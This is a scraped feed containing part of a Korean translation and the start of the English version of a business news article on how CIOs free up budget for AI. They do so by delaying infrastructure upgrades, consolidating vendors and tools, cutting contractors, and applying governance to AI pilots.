</figcaption></figure><p class="imageCredit">Helium SEO</p></div>



<p>파크호츠에 따르면, 유니데이터도 중요하지 않은 인프라 업그레이드를 12~18개월 연기했다. 네트워크 장비 업그레이드와 관리직 직원용 신규 워크스테이션 도입도 미뤄졌다.</p>



<p>AI와 직접 관련 없는 신규 기능도 로드맵에서 빠진다. 드모트는 “올해 계획에는 사용자 경험을 조금씩 개선할 만한 ‘있으면 좋은’ 기능이 있었지만, 엔지니어링 자원을 AI 통합에 투입하기 위해 보류했다”라며, “일부 고객이 지연된 기능을 물었지만, AI 툴이 해낼 수 있는 일을 설명하면 대체로 긍정적인 반응을 보였다”라고 덧붙였다.</p>



<h2 class="wp-block-heading">전통적인 인력 운영 모델의 변화</h2>



<p>전문 서비스 플랫폼 기업 칸타타(Kantata)의 CISO 겸 데이터 보호 책임자인 테이슨 키어니는 AI가 전통적인 인력 운영 모델 자체를 바꿀 수 있는지 계속 따져보고 있다. 핵심은 상대적으로 인건비가 낮은 초급 직원이 AI의 도움을 받아 과거에는 더 높은 숙련도를 요구했던 업무까지 수행할 수 있느냐는 점이다.</p>



<p>키어니는 “일부 시나리오에서는 이런 변화가 비용 구조를 의미 있게 바꾸고, 늘어나는 AI 투자 부담을 상쇄하는 데 도움이 된다”라고 설명했다.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Taison Kearney" class="wp-image-4136807" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Taison Kearney, CISO and data protection officer, Kantata</p>
</figcaption></figure><p class="imageCredit">Kantata</p></div>



<p>칸타타는 조직 전반의 아이디어를 모으기 위해 내부 AI 위원회도 구성했다. 이를 통해 실제로 적용 가능한 기회를 찾고, 각 아이디어를 툴 요구사항, 총투자액, 예상 ROI, 비즈니스 케이스, 내부 개발 및 변화 관리 필요 수준 등 일관된 기준으로 평가하고 있다. 키어니는 “그 결과 제한된 예산을 지나치게 많은 실험 프로젝트에 나눠 쓰기보다 AI가 가장 큰 효율 개선과 측정 가능한 ROI를 낼 수 있는 영역에 의식적으로 투자하는 방향으로 가고 있다”라고 밝혔다.</p>



<p>또한 일부 사례에서는 새로운 툴이나 솔루션 업체에 지출하지 않고도, 이미 사용 중인 AI 플랫폼에 내부 개발 역량을 결합해 필요한 사용례를 해결할 수 있었다. 키어니는 “우리 접근법은 단순히 더 많은 예산을 찾는 데 있지 않다”라며 “AI가 생산성, 확장성, 비용 효율을 분명히 개선하는 영역으로 투자를 재배치하고, 영향력이 작은 과제는 우선순위를 낮추는 데 초점을 맞추고 있다”라고 설명했다.</p>



<h2 class="wp-block-heading">“AI만 예외로 두지 말라” 예산 통제와 거버넌스가 더 중요</h2>



<p>해운 에너지 운송 기업 인터내셔널 시웨이즈(International Seaways)의 부사장 겸 CIO·CISO인 아미트 바수는 이 문제를 다르게 본다. CIO가 AI 예산을 마련하느라 기존 사업을 희생시키는 것이 핵심이 아니라, 오히려 경영진과 이사회가 예산 통제 없이 빠른 AI 도입만 요구하는 경우가 많다는 것이다. 게다가 거버넌스, 보안, 리스크에 대한 관심도 충분치 않다고 지적했다.</p>



<p>바수는 다른 대형 엔터프라이즈 프로젝트에 적용하던 엄격한 기준이 AI 투자에는 동일하게 적용되지 않고 있다고 본다. CIO는 혁신과 실험을 요구받지만, 실제 환경은 결코 안정적이거나 예측 가능하지 않다는 설명이다. 그런데도 성과 평가는 여전히 운영의 확실성을 전제로 한 기존 지표에 기대고 있다. 바수는 “학습을 인정하고 보상하는 방식으로 예산 통제를 바꾸지 않으면, 조직은 빨리 움직이는 것처럼 보이면서도 실제 진전은 더딜 지도 모른다”라고 말했다.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Amit Basu" class="wp-image-4136808" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Amit Basu, VP, CIO, and CISO, International Seaways</p>
</figcaption></figure><p class="imageCredit">International Seaways</p></div>



<p>그 결과 의미 있는 인사이트를 주거나 미래 리스크를 줄여주는 파일럿이라도, 즉각적인 ROI를 내지 못하면 실패로 낙인찍히는 경우가 많다. 바수는 “CIO의 과제는 기존 프로그램 중 어떤 것을 희생할지보다, 조직이 책임 있게 감당할 준비가 되기 전에 너무 빨리 움직이라는 요구를 받고 있다는 데 있다”라며, “결국 CIO와 CISO는 속도와 통제, 혁신과 회복탄력성, 경영진 기대와 규제·운영 현실 사이의 균형을 잡아야 한다”라고 강조했다. 이어 “어떤 프로젝트를 멈출지가 더 큰 위험이 아니라, 충분한 안전장치와 지속 가능성 없이 AI가 도입되는 것이 더 큰 위험일 수 있다”라고 덧붙였다.</p>



<p>나사르도 같은 문제의식을 드러냈다. 디지털 영상 감시 기업으로서 기술 활용에 익숙하지만, AI 리스크는 여전히 의사결정의 핵심 변수이며 올해는 AI 거버넌스를 최우선에 둘 계획이라고 말했다.</p>



<p>나사르는 “우리는 그동안 너무 앞선 프로젝트로 여러 차례 시행착오를 겪었다. 그래서 지금은 이런 툴이나 서비스에 대해 무작정 실험적으로 달려들기를 주저하고 있다”라며, “서두르기보다 운영비 절감과 효율 개선에 실제로 도움이 되는지를 보고 있다”라고 설명했다.</p>



<p>바수는 많은 AI 프로젝트가 기존 예산을 다른 곳에서 빼오는 방식이 아니라, 오히려 이를 가능하게 만들기 위해 인프라, 데이터 플랫폼, 보안에 선행 투자해야 하는 경우가 많다고 강조했다.</p>



<p>인터내셔널 시웨이즈도 일부 AI 사용례의 진행 속도를 늦춘 적이 있다. 바수는 “야망이나 자금이 부족해서가 아니라, 필요한 기반 없이 추진하면 운영 및 보안 리스크를 감당할 수 없는 수준으로 키울 수 있기 때문”이라며, “그런 점에서 AI는 오히려 오래 미뤄왔던 투자를 실행하게 만드는 강제 요인으로 작동했다. 이는 AI 프로그램뿐 아니라 전반적인 기술과 리스크 대응 체계를 더 강하게 만든다”라고 말했다.</p>



<h2 class="wp-block-heading">솔루션 업체 통합 및 툴 축소도 AI 시대의 새 예산 공식</h2>



<p>AI 확산은 솔루션 업체 통합과 계약 재협상까지 촉진하고 있다. 윌리엄스는 “리더들은 AI 플랫폼이나 서비스를 들일 공간을 만들기 위해 겹치는 툴을 과감히 정리하고 라이선스 수를 줄이고, 갱신 시점을 늦추고 있다”라며, “일부는 이미 과부하 상태인 팀이 떠안고 있던 수작업을 AI가 대체한다고 설명하면서 AI 지출을 정당화하기도 한다”라고 말했다.</p>



<p>나사르는 기존 툴 스택을 활용해 AI 프로젝트를 추진할 수 있었고, 필요할 경우 구독 규모를 조금씩 늘리는 방식으로 대응하고 있다고 밝혔다. 전략은 작게 시작해 파일럿이 성과를 입증하면 그때 기능을 더하고 예산도 확대하는 방식이다. 올해 예산의 약 5~10%를 AI에 투입할 계획이며, 내년에는 그 비중이 두 배 또는 세 배까지 늘어날 수 있다고 내다봤다.</p>



<p>드모트는 한발 더 나아가 회사 소프트웨어 툴 스택을 공격적으로 줄이고 통합했다고 밝혔다. 그 결과 구독 비용을 약 40% 절감했고, 절감액은 AI 플랫폼 지출과 엔지니어 추가 채용에 투입했다. 현재 솔루션 엋베들과도 더 좋은 단가를 확보하기 위해 다시 협상하고 있다.</p>



<p>AI 변화 속도가 너무 빠르다는 점도 부담이다. 나사르는 “다음 주에 어떤 툴이 나올지조차 모른다. 그게 가장 두렵다”라며, “앤트로픽의 클로드 같은 새로운 동료가 등장하면서, 이런 시스템을 제대로 이해해야 한다는 압박이 커졌다”라고 말했다.</p>



<p>그럼에도 AI 확산 자체를 외면할 수는 없다. 나사르는 “이제는 선택의 문제가 아니라고 생각한다. 인류 역사상 가장 큰 규모의 자본 지출이 벌어지고 있다”라고 덧붙였다.</p>



<p>윌리엄스는 이런 예산 결정이 결코 가볍게 이뤄지는 것은 아니라고 강조했다. 윌리엄스는 “대부분의 CIO는 단기 안정성을 장기 역량과 맞바꾸고 있다는 사실을 잘 알고 있다. 하지만 AI를 아예 늦추는 것이 다른 이니셔티브를 미루는 것보다 더 큰 위험이라는 공감대가 커지고 있다”라며, “지금 뒤처지면, 나중에 그 격차를 메우는 비용과 충격이 훨씬 더 커질 수 있다”라고 경고했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs cut IT corners to manufacture budget for AI]]></title>
<description><![CDATA[IT leaders worth their salt know how to make tough decisions, and right now, finding funding for AI projects when budgets aren’t growing is testing the bounds of their executive acumen.



Budget constraints are a fact of life, but with pressure from the C-suite and boards to make AI a priority, ...]]></description>
<link>https://tsecurity.de/de/3335371/it-security-nachrichten/cios-cut-it-corners-to-manufacture-budget-for-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3335371/it-security-nachrichten/cios-cut-it-corners-to-manufacture-budget-for-ai/</guid>
<pubDate>Mon, 09 Mar 2026 11:21:08 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IT leaders worth their salt know how to make tough decisions, and right now, finding funding for AI projects when budgets aren’t growing is testing the bounds of their executive acumen.</p>



<p>Budget constraints are a fact of life, but with <a href="https://www.cio.com/article/3982258/ceos-top-priorities-for-it-leaders-today.html">pressure from the C-suite and boards to make AI a priority</a>, IT leaders are feeling extraordinary tension. Often, they must reallocate funds, delay system refreshes, and consolidate vendors and tools while balancing risk and innovation.</p>



<p>“AI spending is moving faster than budgets can realistically keep up with, and most CIOs aren’t ‘finding’ money so much as taking it from somewhere else,” says <a href="https://www.linkedin.com/in/consultantkayla/" rel="nofollow">Kayla Williams</a>, founder and AI and business operations consultant at Twisted Consulting. “The uncomfortable truth is that almost every AI initiative being funded right now is displacing something that was already planned.”</p>



<p><a href="https://www.linkedin.com/in/alex-bakker-986a4018/" rel="nofollow">Alex Bakker</a>, distinguished analyst and director at research firm ISG, says the difficult tradeoffs occur when prioritization comes into play. As a result, “organizations that want to grow AI inevitably need to either apply their modest budget growth overwhelmingly into AI, or they have to find an internal budget to reallocate,” he says. </p>



<p>Reallocations are also time consuming, he adds, and organizations are having to take measures such as decommissioning old apps and <a href="https://www.cio.com/article/472768/5-tips-for-tackling-technical-debt.html">paying off technical debt</a> to free up funding for AI, Bakker says.  </p>



<p>Most often, Williams sees organizations putting long-term optimization projects on the back burner in favor of AI initiatives. “Infrastructure cleanups, system refactors, and non-urgent platform upgrades are getting pushed out because they don’t show immediate business impact,” she says. “Those projects matter, but when budgets are tight, they lose out to AI efforts that promise near-term efficiency or headcount relief.”</p>



<p>There’s also a noticeable shift in how corners are being cut, Williams adds.</p>



<p>“Instead of building ideal, future-proof solutions, teams are accepting narrower implementations and more technical debt,” she says. CIOs are greenlighting smaller AI deployments, fewer integrations, and less customization, with the <a href="https://www.cio.com/article/4066681/ai-could-prove-cios-worst-tech-debt-yet.html">understanding that they’ll have to make modifications later</a>. “It’s not best practice,” she says, “but it’s pragmatic.”</p>



<h2 class="wp-block-heading">Setting boundaries</h2>



<p><a href="https://www.linkedin.com/in/andrew-nassar-842b2125/" rel="nofollow">Andrew Nassar</a>, CTO at IC Realtime, a manufacturer of video surveillance technology, has been grappling with the AI project requests coming into IT while simultaneously being flooded with near-daily news of new AI tools.</p>



<p>“There’s a lot of wants and needs out there outside of IT and we’re doing our best to combat that,” says Nassar, who budgeted for some tools this year but had nothing to spend on AI tools last year. Now, Nassar is more judicious about what IC Realtime purchases. “We’re taking the stance that the outcome of these tools prove instant results and efficiencies to operations and they’re not crazy experimental right now. We’re setting boundaries.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Andrew Nassar" class="wp-image-4136809" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Andrew Nassar, CTO, IC Realtime</p>
</figcaption></figure><p class="imageCredit">IC Realtime</p></div>



<p>That translates into researching and laying out the goals for a particular AI project and <a href="https://www.cio.com/article/4032809/what-cios-need-to-know-about-measuring-ai-value.html">what to measure along way</a>. If a project doesn’t pan out, “we’ll icebox it for now,” Nassar says, adding that IT will typically give it one quarter to prove its merit.</p>



<p>One project that got iced was a big initiative proposed at the end of 2025 by IC Realtime’s customer support team to reorganize the organization’s roles. Part of that involved implementing an autonomous sales agent platform with a support chatbot that would answer questions in real-time and point customers to support articles. However, feedback during a pilot was that customers weren’t finding the support articles, “which resulted in more calls,” he says. And, it would have been “multi-hundreds of thousands [of dollars] to stand this thing up.”</p>



<p>With any initiative, you need to understand the tech behind it and what’s involved in running it, Nassar notes. “It’s not just you turn it on and it and it goes.” The platform would have required a team to maintain and program it and continuously configure and tweak it, he says. Another consideration was the fact that the chatbot would be dealing with outbound voice calls, and it wouldn’t be a good look if it didn’t adhere to the tone of the company.</p>



<p>Telling the support team the project was getting backburnered was “well received,” Nassar says. It wasn’t just because of budget constraints, “but also just the complexity and … maybe the risk that [the chatbot] could go somewhat rogue.”</p>



<h2 class="wp-block-heading">Cutting legacy software and staff, and reallocating funds</h2>



<p>Data platform provider Unidata is also having to redirect funds to AI-based data collection and analysis software — and making tough financial decisions has become the new normal.</p>



<p>“We’re making tough budget cuts to legacy software subscriptions and merging redundant tools to reallocate funds to AI, which has forced us to think outside the box about what we can and can’t live without,” says <a href="https://www.linkedin.com/in/hanna-parkhots-0b478b261/?originalSubdomain=tr" rel="nofollow">Hanna Parkhots</a>, data collection team lead. “This means something has to give, and for us, it’s cutting back on comfort-zone tools we’ve used for years.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Hanna Parkhots" class="wp-image-4136810" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Hanna Parkhots, data collection team lead, Unidata</p>
</figcaption></figure><p class="imageCredit">Unidata</p></div>



<p>Company officials opted to reduce the budget for traditional data validation software by 40% and merged three separate project management tools into one, Parkhots says. “This has given us a total budget savings of around $47,000 per year, which we’re now using to fund our AI-based quality control software that can analyze crowdsourced data 73% faster than our old manual process.”</p>



<p>The hardest cut of all, she says, was reducing the budget for traditional data analyst contractors by 30%. “Instead, we’re allocating about $85,000 in funds to AI software to help supplement what’s left of our internal staff.”</p>



<p>Unidata is also “taking shortcuts on training budgets for legacy systems” because it plans to eventually phase them out. Instead, that money is going directly toward AI development and staff upskilling on new tech, she says.</p>



<p>One of the surprising places where cost cuts have been made is in reducing the disaster recovery testing cycle from quarterly to semiannual, saving about $12,000 in contractor and internal labor costs, according to Parkhots.</p>



<p>“The truth hurts: AI isn’t getting a budget increase; it’s taking from everything else,” she says. “We’ve put a hard rule in place that every new AI project must find an equivalent budget cut elsewhere. … This is a zero-sum game that forces us to reevaluate what adds real value versus what we’re just doing out of habit.”</p>



<h2 class="wp-block-heading">Delaying infrastructure improvements, shelving other projects</h2>



<p>Another strategy IT leaders are adopting is to delay non-critical infrastructure improvements. <a href="https://www.linkedin.com/in/paul-demott/" rel="nofollow">Paul DeMott</a>, CTO of digital marketing agency Helium SEO, says server capacity expansion and network improvements were put on the back burner for 12 to 18 months “because existing infrastructure was adequate.” That freed up about 30% of IT’s annual infrastructure budget for developing AI and paying API costs.</p>



<p>Servers are running closer to capacity limits, he admits, “but the AI tools do make more value than marginal improvements in performance would have.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Paul DeMott" class="wp-image-4136806" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Paul DeMott, CTO, Helium SEO</p>
</figcaption></figure><p class="imageCredit">Helium SEO</p></div>



<p>Parkhots echoes that, saying Unidata has also put off upgrading non-critical infrastructure for 12 to 18 months. That means no upgrades to network equipment, and no new workstations for administrative staff, she says.</p>



<p>New features not directly related to AI have also been shelved, DeMott says. Helium SEO’s roadmap for this year had “nice-to-have features that would have improved user experience incrementally, but those got shelved to put engineering resources to AI integration,” he says. “Some clients have asked about those delayed features, but when presented with what the AI tools could do, it was a positive reaction.”</p>



<h2 class="wp-block-heading">Changing traditional resourcing models</h2>



<p><a href="https://www.linkedin.com/in/taisonkearney/" rel="nofollow">Taison Kearney</a>,CISO and data protection officer for professional services platform provider Kantata, has been “pushing the question” of whether AI can change traditional resourcing models. Specifically, he wants to see whether the technology can enable more junior, lower-cost roles to successfully perform work that previously required more senior expertise.</p>



<p>“In some scenarios, that shift meaningfully changes the cost equation and helps offset rising AI investment,” he explains.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Taison Kearney" class="wp-image-4136807" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/taison-kearney-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Taison Kearney, CISO and data protection officer, Kantata</p>
</figcaption></figure><p class="imageCredit">Kantata</p></div>



<p>Company officials have also formed an internal AI council that encourages ideas from across the organization to ensure it identifies real, practical opportunities. “Each idea is evaluated against consistent criteria, including tooling requirements, total investment, estimated ROI, business case, and the amount of internal development or change management required,” Kearney says.</p>



<p>Based on those inputs, “the focus has been on making conscious business decisions to invest where AI can drive the greatest efficiency gains and measurable ROI, rather than spreading limited budget across too many experimental efforts.”</p>



<p>In several instances, there have been opportunities to solve use cases by developing internal AI capabilities and leveraging AI platforms already in use and pairing them with internal development, rather than adding new tools or incremental vendor spend, Kearney says.</p>



<p>Overall, Kantata’s approach hasn’t been about simply “finding more budget,” he adds, “but about reallocating investment toward initiatives where AI clearly improves productivity, scalability, and cost efficiency, while deprioritizing lower-impact efforts.” </p>



<h2 class="wp-block-heading">Practicing ‘budget discipline’ amid the rapid adoption of AI</h2>



<p><a href="https://www.linkedin.com/in/amitbasu/" rel="nofollow">Amit Basu</a>, vice president, CIO, and CISO of maritime energy transportation company International Seaways, sees the issue of budget sacrificing differently. In many cases, the pressure is not that CIOs are struggling to free up funding for AI, he says, but that senior management and boards are pushing for rapid AI adoption without “corresponding budget discipline, and often, without sufficient focus on governance, security, and risk.’”</p>



<p>The <a href="https://www.csoonline.com/article/3529615/companies-skip-security-hardening-in-rush-to-adopt-ai.html">same rigor is not being applied to AI investments</a> that CIOs apply to other major enterprise initiatives, Basu believes. While CIOs are expected to innovate and experiment with AI initiatives, they don’t operate in stable or predictable environments, he says. Yet the metrics used to evaluate success assume operational certainty.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Amit Basu" class="wp-image-4136808" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, 